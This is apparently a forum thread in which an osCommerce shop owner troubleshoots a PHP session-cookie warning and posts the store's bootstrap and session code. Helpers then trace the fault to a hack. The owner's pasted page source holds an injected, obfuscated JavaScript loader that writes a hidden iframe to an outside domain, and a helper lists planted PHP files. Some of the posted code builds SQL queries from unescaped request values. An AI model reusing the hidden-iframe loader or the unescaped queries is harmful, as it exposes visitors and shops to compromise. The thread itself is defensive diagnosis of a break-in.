Session_Start() [Function.session-start]: Cannot Send Session Cookie

[home_field]

Hi

 

on my site i am gettin the following error message.

 

Warning: Session_Start() [function.session-start]: Cannot send session cooki - headers alresy sent by (output started at /home/hfsonlin/public_html/includes/application_top.php:29)
in /home/hfsonlin/public_html/includes/functions/session.php on line 45

 

I have searched forums looking for solutions, i have tried removing all white spaces from my files.. I have stopped using filemanager and now use dreamweaver, but still with no luck

 

has anyone any ideas of what i could be doing wrong.

 

thanks

 

donal

[MrPhil]

The error message tells you that application_top.php sent text output to the browser on or near line 29. It shouldn't have. Check if there is an error message before that one (issued by application_top -- perhaps that includes/configure.php is not readable?), or garbage from a bad edit, or even a hack. Read my sig > FAQs > "Cannot modify header" for more suggestions on where to look.

[home_field]

Phil,

 

I read your FAQs and they where a real help in understanding the problem, but i still cant for the life of me fix it..

 

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/hfsonlin/public_html/includes/application_top.php:29) in /home/hfsonlin/public_html/includes/functions/sessions.php on line 102

 

application_top.php code:

 

<?php
/*
 $Id: application_top.php 1833 2008-01-30 22:03:30Z hpdl $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2008 osCommerce

 Released under the GNU General Public License
*/

// start the timer for the page parse time log
 define('PAGE_PARSE_START_TIME', microtime());

// set the level of error reporting
 error_reporting(E_ALL & ~E_NOTICE);

// check support for register_globals
 if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) {
   exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.');
 }

// Set the local configuration parameters - mainly for developers
 if (file_exists('includes/local/configure.php')) include('includes/local/configure.php');

// include server parameters
 require('includes/configure.php');

 if (strlen(DB_SERVER) < 1) {
   if (is_dir('install')) {
     header('Location: install/index.php');
   }
 }

// define the project version
 define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a');

// some code to solve compatibility issues
 require(DIR_WS_FUNCTIONS . 'compatibility.php');
// set the type of request (secure or not)
 $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL';
// set php_self in the local scope
 if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];

 if ($request_type == 'NONSSL') {
   define('DIR_WS_CATALOG', DIR_WS_HTTP_CATALOG);
 } else {
   define('DIR_WS_CATALOG', DIR_WS_HTTPS_CATALOG);
 }

// include the list of project filenames
 require(DIR_WS_INCLUDES . 'filenames.php');

// include the list of project database tables
 require(DIR_WS_INCLUDES . 'database_tables.php');

// customization for the design layout
 define('BOX_WIDTH', 190); // how wide the boxes should be in pixels (default: 125)
define('BOX_WIDTH_RIGHT', 163); // how wide the boxes should be in pixels (default: 125)
// include the database functions
 require(DIR_WS_FUNCTIONS . 'database.php');

// make a connection to the database... now
 tep_db_connect() or die('Unable to connect to database server!');

// set the application parameters
 $configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION);
 while ($configuration = tep_db_fetch_array($configuration_query)) {
   define($configuration['cfgKey'], $configuration['cfgValue']);
 }

// if gzip_compression is enabled, start to buffer the output
 if ( (GZIP_COMPRESSION == 'true') && ($ext_zlib_loaded = extension_loaded('zlib')) && (PHP_VERSION >= '4') ) {
   if (($ini_zlib_output_compression = (int)ini_get('zlib.output_compression')) < 1) {
     if (PHP_VERSION >= '4.0.4') {
       ob_start('ob_gzhandler');
     } else {
       include(DIR_WS_FUNCTIONS . 'gzip_compression.php');
       ob_start();
       ob_implicit_flush();
     }
   } else {
     ini_set('zlib.output_compression_level', GZIP_LEVEL);
   }
 }

// set the HTTP GET parameters manually if search_engine_friendly_urls is enabled
 if (SEARCH_ENGINE_FRIENDLY_URLS == 'true') {
   if (strlen(getenv('PATH_INFO')) > 1) {
     $GET_array = array();
     $PHP_SELF = str_replace(getenv('PATH_INFO'), '', $PHP_SELF);
     $vars = explode('/', substr(getenv('PATH_INFO'), 1));
     for ($i=0, $n=sizeof($vars); $i<$n; $i++) {
       if (strpos($vars[$i], '[]')) {
         $GET_array[substr($vars[$i], 0, -2)][] = $vars[$i+1];
       } else {
         $HTTP_GET_VARS[$vars[$i]] = $vars[$i+1];
       }
       $i++;
     }

     if (sizeof($GET_array) > 0) {
       while (list($key, $value) = each($GET_array)) {
         $HTTP_GET_VARS[$key] = $value;
       }
     }
   }
 }

// define general functions used application-wide
 require(DIR_WS_FUNCTIONS . 'general.php');
 require(DIR_WS_FUNCTIONS . 'html_output.php');

// set the cookie domain
 $cookie_domain = (($request_type == 'NONSSL') ? HTTP_COOKIE_DOMAIN : HTTPS_COOKIE_DOMAIN);
 $cookie_path = (($request_type == 'NONSSL') ? HTTP_COOKIE_PATH : HTTPS_COOKIE_PATH);

// include cache functions if enabled
 if (USE_CACHE == 'true') include(DIR_WS_FUNCTIONS . 'cache.php');

// include shopping cart class
 require(DIR_WS_CLASSES . 'shopping_cart.php');

// include navigation history class
 require(DIR_WS_CLASSES . 'navigation_history.php');

// check if sessions are supported, otherwise use the php3 compatible session class
 if (!function_exists('session_start')) {
   define('PHP_SESSION_NAME', 'osCsid');
   define('PHP_SESSION_PATH', $cookie_path);
   define('PHP_SESSION_DOMAIN', $cookie_domain);
   define('PHP_SESSION_SAVE_PATH', SESSION_WRITE_DIRECTORY);

   include(DIR_WS_CLASSES . 'sessions.php');
 }

// define how the session functions will be used
 require(DIR_WS_FUNCTIONS . 'sessions.php');

// set the session name and save path
 tep_session_name('osCsid');
 tep_session_save_path(SESSION_WRITE_DIRECTORY);

// set the session cookie parameters
  if (function_exists('session_set_cookie_params')) {
   session_set_cookie_params(0, $cookie_path, $cookie_domain);
 } elseif (function_exists('ini_set')) {
   ini_set('session.cookie_lifetime', '0');
   ini_set('session.cookie_path', $cookie_path);
   ini_set('session.cookie_domain', $cookie_domain);
 }

// set the session ID if it exists
  if (isset($HTTP_POST_VARS[tep_session_name()])) {
    tep_session_id($HTTP_POST_VARS[tep_session_name()]);
  } elseif ( ($request_type == 'SSL') && isset($HTTP_GET_VARS[tep_session_name()]) ) {
    tep_session_id($HTTP_GET_VARS[tep_session_name()]);
  }

// start the session
 $session_started = false;
 if (SESSION_FORCE_COOKIE_USE == 'True') {
   tep_setcookie('cookie_test', 'please_accept_for_session', time()+60*60*24*30, $cookie_path, $cookie_domain);

   if (isset($HTTP_COOKIE_VARS['cookie_test'])) {
     tep_session_start();
     $session_started = true;
   }
 } elseif (SESSION_BLOCK_SPIDERS == 'True') {
   $user_agent = strtolower(getenv('HTTP_USER_AGENT'));
   $spider_flag = false;

   if (tep_not_null($user_agent)) {
     $spiders = file(DIR_WS_INCLUDES . 'spiders.txt');

     for ($i=0, $n=sizeof($spiders); $i<$n; $i++) {
       if (tep_not_null($spiders[$i])) {
         if (is_integer(strpos($user_agent, trim($spiders[$i])))) {
           $spider_flag = true;
           break;
         }
       }
     }
   }

   if ($spider_flag == false) {
     tep_session_start();
     $session_started = true;
   }
 } else {
   tep_session_start();
   $session_started = true;
 }

 if ( ($session_started == true) && (PHP_VERSION >= 4.3) && function_exists('ini_get') && (ini_get('register_globals') == false) ) {
   extract($_SESSION, EXTR_OVERWRITE+EXTR_REFS);
 }

// set SID once, even if empty
 $SID = (defined('SID') ? SID : '');

// verify the ssl_session_id if the feature is enabled
 if ( ($request_type == 'SSL') && (SESSION_CHECK_SSL_SESSION_ID == 'True') && (ENABLE_SSL == true) && ($session_started == true) ) {
   $ssl_session_id = getenv('SSL_SESSION_ID');
   if (!tep_session_is_registered('SSL_SESSION_ID')) {
     $SESSION_SSL_ID = $ssl_session_id;
     tep_session_register('SESSION_SSL_ID');
   }

   if ($SESSION_SSL_ID != $ssl_session_id) {
     tep_session_destroy();
     tep_redirect(tep_href_link(FILENAME_SSL_CHECK));
   }
 }

// verify the browser user agent if the feature is enabled
 if (SESSION_CHECK_USER_AGENT == 'True') {
   $http_user_agent = getenv('HTTP_USER_AGENT');
   if (!tep_session_is_registered('SESSION_USER_AGENT')) {
    $SESSION_USER_AGENT = $http_user_agent;
     tep_session_register('SESSION_USER_AGENT');
   }

   if ($SESSION_USER_AGENT != $http_user_agent) {
     tep_session_destroy();
     tep_redirect(tep_href_link(FILENAME_LOGIN));
   }
 }

// verify the IP address if the feature is enabled
 if (SESSION_CHECK_IP_ADDRESS == 'True') {
   $ip_address = tep_get_ip_address();
   if (!tep_session_is_registered('SESSION_IP_ADDRESS')) {
     $SESSION_IP_ADDRESS = $ip_address;
     tep_session_register('SESSION_IP_ADDRESS');
   }

   if ($SESSION_IP_ADDRESS != $ip_address) {
     tep_session_destroy();
     tep_redirect(tep_href_link(FILENAME_LOGIN));
   }
 }

// create the shopping cart & fix the cart if necesary
 if (tep_session_is_registered('cart') && is_object($cart)) {
   if (PHP_VERSION < 4) {
     $broken_cart = $cart;
     $cart = new shoppingCart;
     $cart->unserialize($broken_cart);
   }
 } else {
   tep_session_register('cart');
   $cart = new shoppingCart;
 }

// include currencies class and create an instance
 require(DIR_WS_CLASSES . 'currencies.php');
 $currencies = new currencies();

// include the mail classes
 require(DIR_WS_CLASSES . 'mime.php');
 require(DIR_WS_CLASSES . 'email.php');

// set the language
 if (!tep_session_is_registered('language') || isset($HTTP_GET_VARS['language'])) {
   if (!tep_session_is_registered('language')) {
     tep_session_register('language');
     tep_session_register('languages_id');
   }

   include(DIR_WS_CLASSES . 'language.php');
   $lng = new language();

   if (isset($HTTP_GET_VARS['language']) && tep_not_null($HTTP_GET_VARS['language'])) {
     $lng->set_language($HTTP_GET_VARS['language']);
   } else {
     $lng->get_browser_language();
   }

   $language = $lng->language['directory'];
   $languages_id = $lng->language['id'];
 }

// include the language translations
 require(DIR_WS_LANGUAGES . $language . '.php');

 // Ultimate SEO URLs v2.2d
if ((!defined(SEO_ENABLED)) || (SEO_ENABLED == 'true')) {
  include_once(DIR_WS_CLASSES . 'seo.class.php');
  if ( !is_object($seo_urls) ){
    $seo_urls = new SEO_URL($languages_id);
  }
}


// currency
 if (!tep_session_is_registered('currency') || isset($HTTP_GET_VARS['currency']) || ( (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') && (LANGUAGE_CURRENCY != $currency) ) ) {
   if (!tep_session_is_registered('currency')) tep_session_register('currency');

   if (isset($HTTP_GET_VARS['currency']) && $currencies->is_set($HTTP_GET_VARS['currency'])) {
     $currency = $HTTP_GET_VARS['currency'];
   } else {
     $currency = (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') ? LANGUAGE_CURRENCY : DEFAULT_CURRENCY;
   }
 }

// navigation history
 if (tep_session_is_registered('navigation')) {
   if (PHP_VERSION < 4) {
     $broken_navigation = $navigation;
     $navigation = new navigationHistory;
     $navigation->unserialize($broken_navigation);
   }
 } else {
   tep_session_register('navigation');
   $navigation = new navigationHistory;
 }
 $navigation->add_current_page();

// Shopping cart actions

 if (isset($HTTP_GET_VARS['action'])) {
// redirect the customer to a friendly cookie-must-be-enabled page if cookies are disabled
   if ($session_started == false) {
     tep_redirect(tep_href_link(FILENAME_COOKIE_USAGE));
   }

   if (DISPLAY_CART == 'true') {
     $goto =  FILENAME_SHOPPING_CART;
     $parameters = array('action', 'cPath', 'products_id', 'pid');
   } else {
     $goto = basename($PHP_SELF);
     if ($HTTP_GET_VARS['action'] == 'buy_now') {
       $parameters = array('action', 'pid', 'products_id');
     } else {
       $parameters = array('action', 'pid');
     }
   }
   switch ($HTTP_GET_VARS['action']) {
     // customer wants to update the product quantity in their shopping cart
     case 'update_product' : for ($i=0, $n=sizeof($HTTP_POST_VARS['products_id']); $i<$n; $i++) {
                               if (in_array($HTTP_POST_VARS['products_id'][$i], (is_array($HTTP_POST_VARS['cart_delete']) ? $HTTP_POST_VARS['cart_delete'] : array()))) {
                                 $cart->remove($HTTP_POST_VARS['products_id'][$i]);
                               } else {
                                 if (PHP_VERSION < 4) {
                                   // if PHP3, make correction for lack of multidimensional array.
                                   reset($HTTP_POST_VARS);
                                   while (list($key, $value) = each($HTTP_POST_VARS)) {
                                     if (is_array($value)) {
                                       while (list($key2, $value2) = each($value)) {
                                         if (ereg ("(.*)\]\[(.*)", $key2, $var)) {
                                           $id2[$var[1]][$var[2]] = $value2;
                                         }
                                       }
                                     }
                                   }
                                   $attributes = ($id2[$HTTP_POST_VARS['products_id'][$i]]) ? $id2[$HTTP_POST_VARS['products_id'][$i]] : '';
                                 } else {
                                   $attributes = ($HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]]) ? $HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]] : '';
                                 }
                                 $cart->add_cart($HTTP_POST_VARS['products_id'][$i], $HTTP_POST_VARS['cart_quantity'][$i], $attributes, false);
                               }
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
     // customer adds a product from the products page
     case 'add_product' :    if (isset($HTTP_POST_VARS['products_id']) && is_numeric($HTTP_POST_VARS['products_id'])) {
//++++ QT Pro: Begin Changed code
                               $attributes=array();
                               if (isset($HTTP_POST_VARS['attrcomb']) && (preg_match("/^\d{1,10}-\d{1,10}(,\d{1,10}-\d{1,10})*$/",$HTTP_POST_VARS['attrcomb']))) {
                                 $attrlist=explode(',',$HTTP_POST_VARS['attrcomb']);
                                 foreach ($attrlist as $attr) {
                                   list($oid, $oval)=explode('-',$attr);
                                   if (is_numeric($oid) && $oid==(int)$oid && is_numeric($oval) && $oval==(int)$oval)
                                     $attributes[$oid]=$oval;
                                 }
                               }
                               if (isset($HTTP_POST_VARS['id']) && is_array($HTTP_POST_VARS['id'])) {
                                 foreach ($HTTP_POST_VARS['id'] as $key=>$val) {
                                   if (is_numeric($key) && $key==(int)$key && is_numeric($val) && $val==(int)$val)
                                     $attributes=$attributes + $HTTP_POST_VARS['id'];
                                 }
                               }
                               $cart->add_cart($HTTP_POST_VARS['products_id'], $cart->get_quantity(tep_get_uprid($HTTP_POST_VARS['products_id'], $attributes))+1, $attributes);
//++++ QT Pro: End Changed Code
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
     // performed by the 'buy now' button in product listings and review page
     case 'buy_now' :        if (isset($HTTP_GET_VARS['products_id'])) {
                               if (tep_has_product_attributes($HTTP_GET_VARS['products_id'])) {
                                 tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['products_id']));
                               } else {
                                 $cart->add_cart($HTTP_GET_VARS['products_id'], $cart->get_quantity($HTTP_GET_VARS['products_id'])+1);
                               }
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
     case 'notify' :         if (tep_session_is_registered('customer_id')) {
                               if (isset($HTTP_GET_VARS['products_id'])) {
                                 $notify = $HTTP_GET_VARS['products_id'];
                               } elseif (isset($HTTP_GET_VARS['notify'])) {
                                 $notify = $HTTP_GET_VARS['notify'];
                               } elseif (isset($HTTP_POST_VARS['notify'])) {
                                 $notify = $HTTP_POST_VARS['notify'];
                               } else {
                                 tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));
                               }
                               if (!is_array($notify)) $notify = array($notify);
                               for ($i=0, $n=sizeof($notify); $i<$n; $i++) {
                                 $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $notify[$i] . "' and customers_id = '" . $customer_id . "'");
                                 $check = tep_db_fetch_array($check_query);
                                 if ($check['count'] < 1) {
                                   tep_db_query("insert into " . TABLE_PRODUCTS_NOTIFICATIONS . " (products_id, customers_id, date_added) values ('" . $notify[$i] . "', '" . $customer_id . "', now())");
                                 }
                               }
                               tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));
                             } else {
                               $navigation->set_snapshot();
                               tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
                             }
                             break;
     case 'notify_remove' :  if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['products_id'])) {
                               $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");
                               $check = tep_db_fetch_array($check_query);
                               if ($check['count'] > 0) {
                                 tep_db_query("delete from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");
                               }
                               tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action'))));
                             } else {
                               $navigation->set_snapshot();
                               tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
                             }
                             break;
     case 'cust_order' :     if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['pid'])) {
                               if (tep_has_product_attributes($HTTP_GET_VARS['pid'])) {
                                 tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['pid']));
                               } else {
                                 $cart->add_cart($HTTP_GET_VARS['pid'], $cart->get_quantity($HTTP_GET_VARS['pid'])+1);
                               }
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
   }
 }

// include the who's online functions
 require(DIR_WS_FUNCTIONS . 'whos_online.php');
 tep_update_whos_online();

// include the password crypto functions
 require(DIR_WS_FUNCTIONS . 'password_funcs.php');

// include validation functions (right now only email address)
 require(DIR_WS_FUNCTIONS . 'validations.php');

// split-page-results
 require(DIR_WS_CLASSES . 'split_page_results.php');

// infobox
 require(DIR_WS_CLASSES . 'boxes.php');

// auto activate and expire banners
 require(DIR_WS_FUNCTIONS . 'banner.php');
 tep_activate_banners();
 tep_expire_banners();

// auto expire special products
 require(DIR_WS_FUNCTIONS . 'specials.php');
 tep_expire_specials();



// calculate category path
 if (isset($HTTP_GET_VARS['cPath'])) {
   $cPath = $HTTP_GET_VARS['cPath'];
 } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) {
   $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']);
 } else {
   $cPath = '';
 }

 if (tep_not_null($cPath)) {
   $cPath_array = tep_parse_category_path($cPath);
   $cPath = implode('_', $cPath_array);
   $current_category_id = $cPath_array[(sizeof($cPath_array)-1)];
 } else {
   $current_category_id = 0;
 }

// include the breadcrumb class and start the breadcrumb trail
 require(DIR_WS_CLASSES . 'breadcrumb.php');
 $breadcrumb = new breadcrumb;

 $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER);
 $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link(FILENAME_DEFAULT));

/*** Begin Header Tags SEO ***/  
// add category names or the manufacturer name to the breadcrumb trail
 if (isset($cPath_array)) {
   for ($i=0, $n=sizeof($cPath_array); $i<$n; $i++) {
     $categories_query = tep_db_query("select categories_htc_title_tag from " . TABLE_CATEGORIES_DESCRIPTION . " where categories_id = '" . (int)$cPath_array[$i] . "' and language_id = '" . (int)$languages_id . "' LIMIT 1");
     if (tep_db_num_rows($categories_query) > 0) {
       $categories = tep_db_fetch_array($categories_query);
       $breadcrumb->add($categories['categories_htc_title_tag'], tep_href_link(FILENAME_DEFAULT, 'cPath=' . implode('_', array_slice($cPath_array, 0, ($i+1)))));
     } else {
       break;
     }
   }
 } elseif (isset($_GET['manufacturers_id'])) {
   $manufacturers_query = tep_db_query("select manufacturers_htc_title_tag from " . TABLE_MANUFACTURERS_INFO . " where manufacturers_id = '" . (int)$_GET['manufacturers_id'] . "' AND languages_id = '" . (int)$languages_id . "' LIMIT 1");
   if (tep_db_num_rows($manufacturers_query)) {
     $manufacturers = tep_db_fetch_array($manufacturers_query);
     $breadcrumb->add($manufacturers['manufacturers_htc_title_tag'], tep_href_link(FILENAME_DEFAULT, 'manufacturers_id=' . $_GET['manufacturers_id']));
   }
 }

// add the products name to the breadcrumb trail
if (isset($_GET['products_id'])) {
 $products_query = tep_db_query("select pd.products_head_title_tag from " . TABLE_PRODUCTS . " p left join " . TABLE_PRODUCTS_DESCRIPTION . " pd on p.products_id = pd.products_id where p.products_id = '" . (int)$_GET['products_id'] . "' and pd.language_id ='" .  (int)$languages_id . "' LIMIT 1");
 if (tep_db_num_rows($products_query)) {
   $products = tep_db_fetch_array($products_query);
   $breadcrumb->add($products['products_head_title_tag'], tep_href_link(FILENAME_PRODUCT_INFO, 'cPath=' . $cPath . '&products_id=' . $_GET['products_id']));
 }
} 
/*** End Header Tags SEO ***/

// initialize the message stack for output messages
 require(DIR_WS_CLASSES . 'message_stack.php');
 $messageStack = new messageStack;

// set which precautions should be checked
 define('WARN_INSTALL_EXISTENCE', 'true');
 define('WARN_CONFIG_WRITEABLE', 'true');
 define('WARN_SESSION_DIRECTORY_NOT_WRITEABLE', 'true');
 define('WARN_SESSION_AUTO_START', 'true');
 define('WARN_DOWNLOAD_DIRECTORY_NOT_READABLE', 'true');

if ( (basename($PHP_SELF) != FILENAME_LOGIN) && (basename($PHP_SELF) != FILENAME_LOGOFF) && (basename($PHP_SELF) != FILENAME_CREATE_ACCOUNT) && (basename($PHP_SELF) != FILENAME_CREATE_ACCOUNT_SUCCESS) && (basename($PHP_SELF) != FILENAME_PASSWORD_FORGOTTEN)) {
//$navigation->set_snapshot();
}?>

 

session.php code:

 

<?php
/*
 $Id: sessions.php 1830 2008-01-30 00:58:21Z hpdl $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2008 osCommerce

 Released under the GNU General Public License
*/

 if ( (PHP_VERSION >= 4.3) && ((bool)ini_get('register_globals') == false) ) {
   @ini_set('session.bug_compat_42', 1);
   @ini_set('session.bug_compat_warn', 0);
 }

 if (STORE_SESSIONS == 'mysql') {
   if (!$SESS_LIFE = get_cfg_var('session.gc_maxlifetime')) {
     $SESS_LIFE = 1440;
   }

   function _sess_open($save_path, $session_name) {
     return true;
   }

   function _sess_close() {
     return true;
   }

   function _sess_read($key) {
     $value_query = tep_db_query("select value from " . TABLE_SESSIONS . " where sesskey = '" . tep_db_input($key) . "' and expiry > '" . time() . "'");
     $value = tep_db_fetch_array($value_query);

     if (isset($value['value'])) {
       return $value['value'];
     }

     return '';
   }

   function _sess_write($key, $val) {
     global $SESS_LIFE;

     $expiry = time() + $SESS_LIFE;
     $value = $val;

     $check_query = tep_db_query("select count(*) as total from " . TABLE_SESSIONS . " where sesskey = '" . tep_db_input($key) . "'");
     $check = tep_db_fetch_array($check_query);

     if ($check['total'] > 0) {
       return tep_db_query("update " . TABLE_SESSIONS . " set expiry = '" . tep_db_input($expiry) . "', value = '" . tep_db_input($value) . "' where sesskey = '" . tep_db_input($key) . "'");
     } else {
       return tep_db_query("insert into " . TABLE_SESSIONS . " values ('" . tep_db_input($key) . "', '" . tep_db_input($expiry) . "', '" . tep_db_input($value) . "')");
     }
   }

   function _sess_destroy($key) {
     return tep_db_query("delete from " . TABLE_SESSIONS . " where sesskey = '" . tep_db_input($key) . "'");
   }

   function _sess_gc($maxlifetime) {
     tep_db_query("delete from " . TABLE_SESSIONS . " where expiry < '" . time() . "'");

     return true;
   }

   session_set_save_handler('_sess_open', '_sess_close', '_sess_read', '_sess_write', '_sess_destroy', '_sess_gc');
 }

 function tep_session_start() {
   global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS;

   $sane_session_id = true;

   if (isset($HTTP_GET_VARS[tep_session_name()])) {
     if (preg_match('/^[a-zA-Z0-9]+$/', $HTTP_GET_VARS[tep_session_name()]) == false) {
       unset($HTTP_GET_VARS[tep_session_name()]);

       $sane_session_id = false;
     }
   } elseif (isset($HTTP_POST_VARS[tep_session_name()])) {
     if (preg_match('/^[a-zA-Z0-9]+$/', $HTTP_POST_VARS[tep_session_name()]) == false) {
       unset($HTTP_POST_VARS[tep_session_name()]);

       $sane_session_id = false;
     }
   } elseif (isset($HTTP_COOKIE_VARS[tep_session_name()])) {
     if (preg_match('/^[a-zA-Z0-9]+$/', $HTTP_COOKIE_VARS[tep_session_name()]) == false) {
       $session_data = session_get_cookie_params();

       setcookie(tep_session_name(), '', time()-42000, $session_data['path'], $session_data['domain']);

       $sane_session_id = false;
     }
   }

   if ($sane_session_id == false) {
     tep_redirect(tep_href_link(FILENAME_DEFAULT, '', 'NONSSL', false));
   }

   return session_start();
 }

 function tep_session_register($variable) {
   global $session_started;

   if ($session_started == true) {
     if (PHP_VERSION < 4.3) {
       return session_register($variable);
     } else {
       if (isset($GLOBALS[$variable])) {
         $_SESSION[$variable] =& $GLOBALS[$variable];
       } else {
         $_SESSION[$variable] = null;
       }
     }
   }

   return false;
 }

 function tep_session_is_registered($variable) {
   if (PHP_VERSION < 4.3) {
     return session_is_registered($variable);
   } else {
     return isset($_SESSION) && array_key_exists($variable, $_SESSION);
   }
 }

 function tep_session_unregister($variable) {
   if (PHP_VERSION < 4.3) {
     return session_unregister($variable);
   } else {
     unset($_SESSION[$variable]);
   }
 }

 function tep_session_id($sessid = '') {
   if (!empty($sessid)) {
     return session_id($sessid);
   } else {
     return session_id();
   }
 }

 function tep_session_name($name = '') {
   if (!empty($name)) {
     return session_name($name);
   } else {
     return session_name();
   }
 }

 function tep_session_close() {
   if (PHP_VERSION >= '4.0.4') {
     return session_write_close();
   } elseif (function_exists('session_close')) {
     return session_close();
   }
 }

 function tep_session_destroy() {
   return session_destroy();
 }

 function tep_session_save_path($path = '') {
   if (!empty($path)) {
     return session_save_path($path);
   } else {
     return session_save_path();
   }
 }

 function tep_session_recreate() {
   if (PHP_VERSION >= 4.1) {
     $session_backup = $_SESSION;

     unset($_COOKIE[tep_session_name()]);

     tep_session_destroy();

     if (STORE_SESSIONS == 'mysql') {
       session_set_save_handler('_sess_open', '_sess_close', '_sess_read', '_sess_write', '_sess_destroy', '_sess_gc');
     }

     tep_session_start();

     $_SESSION = $session_backup;
     unset($session_backup);
   }
 }
?>

 

If you could take a look and see if you could spot the error it would be great.

 

Donal

[MrPhil]

If you're looking at the right application_top.php file (the one in includes/, not admin/includes/) the closest thing to line 29 that might give an error is

require('includes/configure.php');

Are you getting an error message on the screen that you're overlooking, perhaps that the file is inaccessible or something? In your browser, View > Page source and see if there is any text ahead of the error message you posted.

 

If you're not sure which is line 29, try inserting a comment line at line 30 or so. If the error message now says 30, move the new comment down by 5 and repeat until the message stays at one line. Move back up one line at a time until the error message again says 30. You should have pinpointed which line is causing output (the one right after the new comment).

 

I've seen lots of people reporting trouble with application_top.php trying to read includes/configure.php. What are configure.php's permissions? It needs to be readable by PHP (usually 444 permissions). If configure.php was outputting any text, I would have expected the error message to give it as the start of output, not application_top.php.

[home_field]

If you're looking at the right application_top.php file (the one in includes/, not admin/includes/) the closest thing to line 29 that might give an error is

require('includes/configure.php');

Are you getting an error message on the screen that you're overlooking, perhaps that the file is inaccessible or something? In your browser, View > Page source and see if there is any text ahead of the error message you posted.

 

If you're not sure which is line 29, try inserting a comment line at line 30 or so. If the error message now says 30, move the new comment down by 5 and repeat until the message stays at one line. Move back up one line at a time until the error message again says 30. You should have pinpointed which line is causing output (the one right after the new comment).

 

I've seen lots of people reporting trouble with application_top.php trying to read includes/configure.php. What are configure.php's permissions? It needs to be readable by PHP (usually 444 permissions). If configure.php was outputting any text, I would have expected the error message to give it as the start of output, not application_top.php.

 

This is what appears at the top when i view the page source.

 

<script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6.7(\'<2 5="4://3.8.9/" b="1" c="1" a="0"></2>\');',13,13,'||iframe|ultimate29|http|src|document|write|co|cc|frameborder|width|height'.split('|'),0,{}));</script><br />
<b>Warning</b>:  session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /home/hfsonlin/public_html/includes/application_top.php:29) in <b>/home/hfsonlin/public_html/includes/functions/sessions.php</b> on line <b>102</b><br />
<br />
<b>Warning</b>:  session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /home/hfsonlin/public_html/includes/application_top.php:29) in <b>/home/hfsonlin/public_html/includes/functions/sessions.php</b> on line <b>102</b><br />

 

I dont know what the first line means, would it be pointing to the problem or error???

 

I changed the permissions on the configure file to 444 but still no luck..

 

I changed the format of the file in notepad++ to binary, to try remove the extra BOM characters but still nothin..

 

i just cant find the problem..

[germ]

Looks like a hack script.

 

Hack files in the images folder:

 

goog1e1239477b169778.php

goog1e1d53f1c6872cb.php

goog1e624842106cc54a.php

goog1ece848648a3a7a0.php

 

Visit the link below:

 

How to Secure Your Site

 

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.

[home_field]

Looks like a hack script.

 

Hack files in the images folder:

 

goog1e1239477b169778.php

goog1e1d53f1c6872cb.php

goog1e624842106cc54a.php

goog1ece848648a3a7a0.php

 

Visit the link below:

 

How to Secure Your Site

 

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.

 

Will deleting these files fix the error or is there other hidin code which would have to be removed..???

 

I have be poined to that security link before, a couple of weeks ago and installed the add-ons..

 

I will take another look at securing the admin side of things..

 

The site must have been hacked before that??

 

donal

[germ]

Read your /includes/application_top.php from the server and post the first 50 or 60 lines from it.

 

I think we'll find hack code there.

[home_field]

Read your /includes/application_top.php from the server and post the first 50 or 60 lines from it.

 

I think we'll find hack code there.

 

application_top

 

<?php
